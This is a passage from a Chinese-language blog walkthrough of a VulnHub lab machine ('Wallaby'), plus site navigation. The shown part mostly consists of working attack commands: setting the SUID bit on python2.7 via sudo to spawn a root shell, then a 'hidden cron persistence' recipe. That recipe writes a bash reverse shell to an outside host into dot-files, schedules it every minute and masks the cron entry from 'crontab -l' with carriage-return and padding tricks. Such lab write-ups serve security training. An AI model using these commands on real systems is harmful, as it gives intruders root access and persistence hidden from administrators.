<p>adm 组确实看起来很有希望。由于 .run 需要一个文件，因此我创建了一个包含以下内容的文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">sudo -l</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">利用具有s权限的python进行提权, 修改下一个脚本以将 suid 位应用于 python 可执行文件：</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">sudo chmod 4777 /usr/bin/python2.7</span><br></pre></td></tr></table></figure>
<p>通过 irssi 执行此脚本，将 python2.7 添加上 SUID 权限<br>
<img data-src="/N1h1l157/VULNHUB/image-189.png" width="270" alt="Image"></p>
<p>此后可以退出 irssi 了 /quit</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ls - al /usr/bin/python2.7</span><br><span class="line">python -c &quot;import os; os.setuid(0); os.system(&#x27;/bin/bash&#x27;)&quot;</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-190.png" width="520" alt="Image">
<p>提权成功拿到了 root 权限</p>
<h3 id="隐蔽cron权限维持"><a class="markdownIt-Anchor" href="#隐蔽cron权限维持">#</a> 隐蔽 cron 权限维持</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看当前计划任务有哪些</span> </span><br><span class="line">crontab -l</span><br><span class="line"></span><br><span class="line">cat &gt; /root/.first.sh &lt;&lt;EOF</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.31.135/4444 0&gt;&amp;1</span><br><span class="line">EOF</span><br><span class="line"></span><br><span class="line">cat &gt; /root/.second.sh &lt;&lt; EOF</span><br><span class="line">(crontab -l;printf &quot;*/1 * * * * /root/.first.sh;\rno crontab for `whoami`%100c\n&quot;)|crontab -</span><br><span class="line">EOF</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">*/1 * * * *：每隔 1 分钟执行一次；</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">/r：<span class="built_in">cat</span>默认支持 \r 回车符 \n 换行符 \f 换页符这些符号，会导致显示截断隐藏命令，隐藏真实的计划任务；</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">%100c：格式化输出一个字符，前面 99 个空格补齐。使用空格帮助我们把前面的内容在 crontab 中遮盖掉；</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">如果想让创建的文件隐蔽性更强，可以创建名为<span class="string">&quot;..&quot;</span>、“...”或以..等开头的文件。</span></span><br><span class="line"></span><br><span class="line">chmod 777 .first.sh</span><br><span class="line">chmod 777 .second.sh</span><br><span class="line">/root/.second.sh</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-191.png" width="520" alt="Image">
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">如果发现无法运行，可以通过下列两个命令查看详细计划任务</span></span><br><span class="line">cat /var/spool/cron/crontabs/root -A</span><br><span class="line">crontab -e 或者 vi /etc/crontab</span><br></pre></td></tr></table></figure>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">在kali机器上监听 4444 端口，每隔一分钟收到将会一次shell</span></span><br><span class="line">nc - lvvp 4444</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">执行一下命令产生一个标准的shell：</span></span><br><span class="line">python3 -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br><span class="line">stty raw -echo;</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-192.png" width="520" alt="Image">
<p>-&gt; 只要开启 kali 的 4444 端口，很快就会收到 root 账户的 shell</p>

      <div class="tags">
          <a href="/tags/VULNHUB-1-10/" rel="tag"><i class="ic i-tag"></i> VULNHUB 1-10</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-07-06 23:11:20" itemprop="dateModified" datetime="2023-07-06T23:11:20+08:00">2023-07-06</time>
  </span>
  <span id="2021/11/01/VULNHUB/109 WALLABY/" class="item leancloud_visitors" data-flag-title="VULNHUB 9 WALLABY" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt=".N1h1l157 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt=".N1h1l157 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt=".N1h1l157 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>.N1h1l157 <i class="ic i-at"><em>@</em></i>X_T
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://n1h1l157.github.io/2021/11/01/VULNHUB/109%20WALLABY/" title="VULNHUB 9 WALLABY">https://n1h1l157.github.io/2021/11/01/VULNHUB/109 WALLABY/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/11/01/VULNHUB/108%20MATRIX/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;nNsjUzcTObfYtMa.jpg" title="VULNHUB 8 MATRIX">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB 8 MATRIX</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/11/01/VULNHUB/107%20RECON/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;x6dgpGLH7auh2Sy.jpg" title="VULNHUB 7 RECON">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB 7 RECON</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A1%AE%E8%AE%A4%E6%94%BB%E5%87%BB%E7%9B%AE%E6%A0%87"><span class="toc-number">1.</span> <span class="toc-text"> 确认攻击目标</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#lfi-%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">2.</span> <span class="toc-text"> LFI 漏洞测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#60080-%E7%BD%91%E7%AB%99%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">3.</span> <span class="toc-text"> 60080 网站信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dirb-%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">4.</span> <span class="toc-text"> dirb 目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#phpcurlbashnc-%E5%8F%8D%E5%BC%B9"><span class="toc-number">5.</span> <span class="toc-text"> php&#x2F;curl&#x2F;bash&#x2F;nc 反弹</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kali-php%E6%9C%A8%E9%A9%AC%E5%8F%8D%E5%BC%B9"><span class="toc-number">6.</span> <span class="toc-text"> kali php 木马反弹</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#python%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">7.</span> <span class="toc-text"> python 反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#msf%E7%94%9F%E6%88%90php%E5%8F%8D%E5%BC%B9"><span class="toc-number">8.</span> <span class="toc-text"> msf 生成 php 反弹</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#stty-%E5%BC%82%E5%B8%B8%E5%A4%84%E7%90%86"><span class="toc-number">9.</span> <span class="toc-text"> stty 异常处理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%A7%BB%E5%88%B0%E5%8F%A6%E4%B8%80shell"><span class="toc-number">10.</span> <span class="toc-text"> 权限移到另一 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sudovim%E6%8F%90%E6%9D%83"><span class="toc-number">11.</span> <span class="toc-text"> sudo (vim) 提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%8F%E7%89%9B%E6%8F%90%E6%9D%83"><span class="toc-number">12.</span> <span class="toc-text"> 脏牛提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#issri-%E6%94%BB%E5%87%BB-irc"><span class="toc-number">13.</span> <span class="toc-text"> issri 攻击 irc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#suid-python%E6%8F%90%E6%9D%83"><span class="toc-number">14.</span> <span class="toc-text"> SUID python 提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9A%90%E8%94%BDcron%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-number">15.</span> <span class="toc-text"> 隐蔽 cron 权限维持</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2021/11/01/VULNHUB/102%20NAPPING/" rel="bookmark" title="VULNHUB 2 NAPPING">VULNHUB 2 NAPPING</a></li><li><a href="/2021/11/01/VULNHUB/104%20BREAKOUT/" rel="bookmark" title="VULNHUB 4 BREAKOUT">VULNHUB 4 BREAKOUT</a></li><li><a href="/2021/11/01/VULNHUB/101%20EVM/" rel="bookmark" title="VULNHUB 1 EVM">VULNHUB 1 EVM</a></li><li><a href="/2021/11/01/VULNHUB/103%20HACKSUDO/" rel="bookmark" title="VULNHUB 3 HACKSUDO">VULNHUB 3 HACKSUDO</a></li><li><a href="/2021/11/01/VULNHUB/105%20EARTH/" rel="bookmark" title="VULNHUB 5 EARTH">VULNHUB 5 EARTH</a></li><li><a href="/2021/11/01/VULNHUB/107%20RECON/" rel="bookmark" title="VULNHUB 7 RECON">VULNHUB 7 RECON</a></li><li class="active"><a href="/2021/11/01/VULNHUB/109%20WALLABY/" rel="bookmark" title="VULNHUB 9 WALLABY">VULNHUB 9 WALLABY</a></li><li><a href="/2021/11/01/VULNHUB/108%20MATRIX/" rel="bookmark" title="VULNHUB 8 MATRIX">VULNHUB 8 MATRIX</a></li><li><a href="/2021/11/01/VULNHUB/110%20RED/" rel="bookmark" title="VULNHUB 10 RED">VULNHUB 10 RED</a></li><li><a href="/2021/11/01/VULNHUB/111%20DEATHNOTE/" rel="bookmark" title="VULNHUB 11 DEATHNOTE">VULNHUB 11 DEATHNOTE</a></li><li><a href="/2021/11/01/VULNHUB/112%20THOTH/" rel="bookmark" title="VULNHUB 12 THOTH">VULNHUB 12 THOTH</a></li><li><a href="/2021/11/01/VULNHUB/113%20CHRONOS/" rel="bookmark" title="VULNHUB 13 CHRONOS">VULNHUB 13 CHRONOS</a></li><li><a href="/2021/11/01/VULNHUB/116%20LUPINONE/" rel="bookmark" title="VULNHUB 16 LUPINONE">VULNHUB 16 LUPINONE</a></li><li><a href="/2021/11/01/VULNHUB/117%20WEBMACHINE/" rel="bookmark" title="VULNHUB 17 WEBMACHINE">VULNHUB 17 WEBMACHINE</a></li><li><a href="/2021/11/01/VULNHUB/118%20JANGOW/" rel="bookmark" title="VULNHUB 18 JANGOW">VULNHUB 18 JANGOW</a></li><li><a href="/2021/11/01/VULNHUB/119%20THOR/" rel="bookmark" title="VULNHUB 19 THOR">VULNHUB 19 THOR</a></li><li><a href="/2021/11/01/VULNHUB/106%20SYMFONOS/" rel="bookmark" title="VULNHUB 6 SYMFONOS">VULNHUB 6 SYMFONOS</a></li><li><a href="/2021/11/01/VULNHUB/115%20THALES/" rel="bookmark" title="VULNHUB 15 THALES">VULNHUB 15 THALES</a></li><li><a href="/2021/11/01/VULNHUB/120%20BEELZEBUB/" rel="bookmark" title="VULNHUB 20 BEELZEBUB">VULNHUB 20 BEELZEBUB</a></li><li><a href="/2021/11/01/VULNHUB/121%20RIPPER/" rel="bookmark" title="VULNHUB 21 RIPPER">VULNHUB 21 RIPPER</a></li><li><a href="/2021/11/01/VULNHUB/123%20KEYRING/" rel="bookmark" title="VULNHUB 23 KEYRING">VULNHUB 23 KEYRING</a></li><li><a href="/2021/11/01/VULNHUB/124%20HACKABLELL/" rel="bookmark" title="VULNHUB 24 HACKABLELL">VULNHUB 24 HACKABLELL</a></li><li><a href="/2021/11/01/VULNHUB/114%20ICA/" rel="bookmark" title="VULNHUB 14 ICA">VULNHUB 14 ICA</a></li><li><a href="/2021/11/01/VULNHUB/122%20FUNBOX10/" rel="bookmark" title="VULNHUB 22 FUNBOX10">VULNHUB 22 FUNBOX10</a></li><li><a href="/2021/11/01/VULNHUB/125%20SNAKEOIL/" rel="bookmark" title="VULNHUB 25 SNAKEOIL">VULNHUB 25 SNAKEOIL</a></li><li><a href="/2021/11/01/VULNHUB/129%20PRESIDENTIAL/" rel="bookmark" title="VULNHUB 29 PRESIDENTIAL">VULNHUB 29 PRESIDENTIAL</a></li><li><a href="/2021/11/01/VULNHUB/127%20TYPO/" rel="bookmark" title="VULNHUB 27 TYPO">VULNHUB 27 TYPO</a></li><li><a href="/2021/11/01/VULNHUB/130%20MOMENTUM2/" rel="bookmark" title="VULNHUB 30 MOMENTUM2">VULNHUB 30 MOMENTUM2</a></li><li><a href="/2021/11/01/VULNHUB/126%20HACKERKID/" rel="bookmark" title="VULNHUB 26 HACKERKID">VULNHUB 26 HACKERKID</a></li><li><a href="/2021/11/01/VULNHUB/132%20JETTY/" rel="bookmark" title="VULNHUB 32 JETTY">VULNHUB 32 JETTY</a></li><li><a href="/2021/11/01/VULNHUB/134%20GROTESQUE2/" rel="bookmark" title="VULNHUB 34 GROTESQUE2">VULNHUB 34 GROTESQUE2</a></li><li><a href="/2021/11/01/VULNHUB/135%20HACKABLE3/" rel="bookmark" title="VULNHUB 35 HACKABLE3">VULNHUB 35 HACKABLE3</a></li><li><a href="/2021/11/01/VULNHUB/128%20BLUEMOON/" rel="bookmark" title="VULNHUB 28 BLUEMOON">VULNHUB 28 BLUEMOON</a></li><li><a href="/2021/11/01/VULNHUB/136%20GROTESQUE1/" rel="bookmark" title="VULNHUB 36 GROTESQUE1">VULNHUB 36 GROTESQUE1</a></li><li><a href="/2021/11/01/VULNHUB/137%20VENUS/" rel="bookmark" title="VULNHUB 37 VENUS">VULNHUB 37 VENUS</a></li><li><a href="/2021/11/01/VULNHUB/133%20GROTESQUE3/" rel="bookmark" title="VULNHUB 33 GROTESQUE3">VULNHUB 33 GROTESQUE3</a></li><li><a href="/2021/11/01/VULNHUB/131%20PROXIMACENTAURI/" rel="bookmark" title="VULNHUB 31 PROXIMACENTAURI">VULNHUB 31 PROXIMACENTAURI</a></li><li><a href="/2021/11/01/VULNHUB/139%20INFERNO/" rel="bookmark" title="VULNHUB 39 INFERNO">VULNHUB 39 INFERNO</a></li><li><a href="/2021/11/01/VULNHUB/141%20CENGBOX3/" rel="bookmark" title="VULNHUB 41 CENGBOX3">VULNHUB 41 CENGBOX3</a></li><li><a href="/2021/11/01/VULNHUB/142%20DARKHOLE2/" rel="bookmark" title="VULNHUB 42 DARKHOLE2">VULNHUB 42 DARKHOLE2</a></li><li><a href="/2021/11/01/VULNHUB/143%20ORASI/" rel="bookmark" title="VULNHUB 43 ORASI">VULNHUB 43 ORASI</a></li><li><a href="/2021/11/01/VULNHUB/144%20CEREAL/" rel="bookmark" title="VULNHUB 44 CEREAL">VULNHUB 44 CEREAL</a></li><li><a href="/2021/11/01/VULNHUB/138%20BLUESOMKE/" rel="bookmark" title="VULNHUB 38 BLUESOMKE">VULNHUB 38 BLUESOMKE</a></li><li><a href="/2021/11/01/VULNHUB/145%20TORANDO/" rel="bookmark" title="VULNHUB 45 TORANDO">VULNHUB 45 TORANDO</a></li><li><a href="/2021/11/01/VULNHUB/140%20LOOZ/" rel="bookmark" title="VULNHUB 40 LOOZ">VULNHUB 40 LOOZ</a></li><li><a href="/2021/11/01/VULNHUB/147%20WARZONE3/" rel="bookmark" title="VULNHUB 47 WARZONE3">VULNHUB 47 WARZONE3</a></li><li><a href="/2021/11/01/VULNHUB/146%20NEMESIS/" rel="bookmark" title="VULNHUB 46 NEMESIS">VULNHUB 46 NEMESIS</a></li><li><a href="/2021/11/01/VULNHUB/149%20DURIAN/" rel="bookmark" title="VULNHUB 49 DURIAN">VULNHUB 49 DURIAN</a></li><li><a href="/2021/11/01/VULNHUB/148%20GITROOT/" rel="bookmark" title="VULNHUB 48 GITROOT">VULNHUB 48 GITROOT</a></li><li><a href="/2021/11/01/VULNHUB/150%20POWERGRID/" rel="bookmark" title="VULNHUB 50 POWERGRID">VULNHUB 50 POWERGRID</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt=".N1h1l157"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">.N1h1l157</p>
  <div class="description" itemprop="description">人生如逆旅，我亦是行人</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">165</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">5</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">39</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL04xaDFsMTU3" title="https:&#x2F;&#x2F;github.com&#x2F;N1h1l157"><i class="ic i-github"></i></span>
      <span class="exturl item twitter" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS9YVDcyNzgwMzA4" title="https:&#x2F;&#x2F;twitter.com&#x2F;XT72780308"><i class="ic i-twitter"></i></span>
      <span class="exturl item weibo" data-url="aHR0cHM6Ly9tLndlaWJvLmNuL3Byb2ZpbGUvNTgyOTg0MzUyNQ==" title="https:&#x2F;&#x2F;m.weibo.cn&#x2F;profile&#x2F;5829843525"><i class="ic i-weibo"></i></span>
      <span class="exturl item about" data-url="aHR0cHM6Ly90Lm1lL24xaDFsMTU3" title="https:&#x2F;&#x2F;t.me&#x2F;n1h1l157"><i class="ic i-address-card"></i></span>
      <span class="exturl item email" data-url="bWFpbHRvOjEyMjgwNTc4NjlAcXEuY29t" title="mailto:1228057869@qq.com"><i class="ic i-envelope"></i></span>
      <span class="exturl item facebook" data-url="aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3Byb2ZpbGUucGhwP2lkPTEwMDA4NDUzNzQwNTEzNw==" title="https:&#x2F;&#x2F;www.facebook.com&#x2F;profile.php?id&#x3D;100084537405137"><i class="ic i-facebook"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>友链</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-clipboard"></i>书架</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/books/LITERATURE/" rel="section"><i class="ic i-fedora"></i>LITERATURE</a>
  </li>

        
  <li class="item">
    <a href="/books/VULNHUB/" rel="section"><i class="ic i-android"></i>X_T-VULNHUB</a>
  </li>

        
  <li class="item">
    <a href="/books/XIAODI/" rel="section"><i class="ic i-opera"></i>XIAODI-SAFE</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2021/11/01/VULNHUB/108%20MATRIX/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2021/11/01/VULNHUB/107%20RECON/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%B8%96%E7%95%8C%E5%90%8D%E8%91%97/" title="分类于 世界名著">世界名著</a>
</div>

    <span><a href="/2019/07/01/BOOK/38%E3%80%8A%E5%84%BF%E5%AD%90%E4%B8%8E%E6%83%85%E4%BA%BA%E3%80%8B%E5%8A%B3%E4%BC%A6%E6%96%AF/" title="《儿子与情人》劳伦斯">《儿子与情人》劳伦斯</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/VULNHUB/" title="分类于 VULNHUB">VULNHUB</a>
</div>

    <span><a href="/2021/11/01/VULNHUB/117%20WEBMACHINE/" title="VULNHUB 17 WEBMACHINE">VULNHUB 17 WEBMACHINE</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/MBTI/" title="分类于 MBTI">MBTI</a>
</div>

    <span><a href="/2020/04/01/MBTI/%E4%B9%9D%E5%9E%8B%E4%BA%BA%E6%A0%BC/" title="九型人格">九型人格</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/VULNHUB/" title="分类于 VULNHUB">VULNHUB</a>
</div>

    <span><a href="/2021/11/01/VULNHUB/121%20RIPPER/" title="VULNHUB 21 RIPPER">VULNHUB 21 RIPPER</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E6%96%87%E5%AD%A6/" title="分类于 文学">文学</a>
</div>

    <span><a href="/2019/07/01/BOOK/7%E3%80%8A%E6%B4%BB%E7%9D%80%E3%80%8B%E4%BD%99%E5%8D%8E/" title="《活着》余华">《活着》余华</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E6%96%87%E5%AD%A6/" title="分类于 文学">文学</a>
</div>

    <span><a href="/2019/07/01/BOOK/11%E3%80%8A%E9%98%BF%E5%BC%A5%E9%99%80%E4%BD%9B%E4%B9%88%E4%B9%88%E5%93%92%E3%80%8B%E5%A4%A7%E5%86%B0/" title="《阿弥陀佛么么哒》大冰">《阿弥陀佛么么哒》大冰</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/MBTI/" title="分类于 MBTI">MBTI</a>
</div>

    <span><a href="/2020/04/01/MBTI/ENTJ%E8%A7%A3%E8%AF%BB/" title="ENTJ解读">ENTJ解读</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/VULNHUB/" title="分类于 VULNHUB">VULNHUB</a>
</div>

    <span><a href="/2021/11/01/VULNHUB/145%20TORANDO/" title="VULNHUB 45 TORANDO">VULNHUB 45 TORANDO</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" title="分类于 信息安全">信息安全</a>
</div>

    <span><a href="/2022/12/30/SAFE/1%20WEB%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" title="XD22 1 Web 基础知识">XD22 1 Web 基础知识</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/VULNHUB/" title="分类于 VULNHUB">VULNHUB</a>
</div>

    <span><a href="/2021/11/01/VULNHUB/119%20THOR/" title="VULNHUB 19 THOR">VULNHUB 19 THOR</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2019 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">.N1h1l157 @ Phut Hon</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">747k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">20:45</span>
  </div>

<!--   自定义开启一个网站的运行时间 -->
  <div class="site-uptime">
    Site uptime: <span id="site-uptime"></span>
  </div>
  <script>
    var siteUptimeElement = document.getElementById('site-uptime');
    var siteSetupDate = new Date('2019-06-01'); // 替换为您的网站具体创建日期，格式为 'YYYY-MM-DD'
    setInterval(function() {
      var currentTime = new Date();
      var uptime = formatUptime(currentTime - siteSetupDate);
      siteUptimeElement.textContent = uptime;
    }, 1000);

    function formatUptime(milliseconds) {
      var seconds = Math.floor(milliseconds / 1000);
      var minutes = Math.floor(seconds / 60);
      var hours = Math.floor(minutes / 60);
      var days = Math.floor(hours / 24);

      var uptime = '';
      if (days > 0) {
        uptime += days + '天 ';
      }
      if (hours > 0) {
        uptime += (hours % 24) + '时 ';
      }
      if (minutes > 0) {
        uptime += (minutes % 60) + '分 ';
      }
      uptime += (seconds % 60) + '秒';

      return uptime;
    }
  </script>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/11/01/VULNHUB/109 WALLABY/',
    favicon: {
      show: "Cryp71c3",
      hide: "十年磨一剑"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
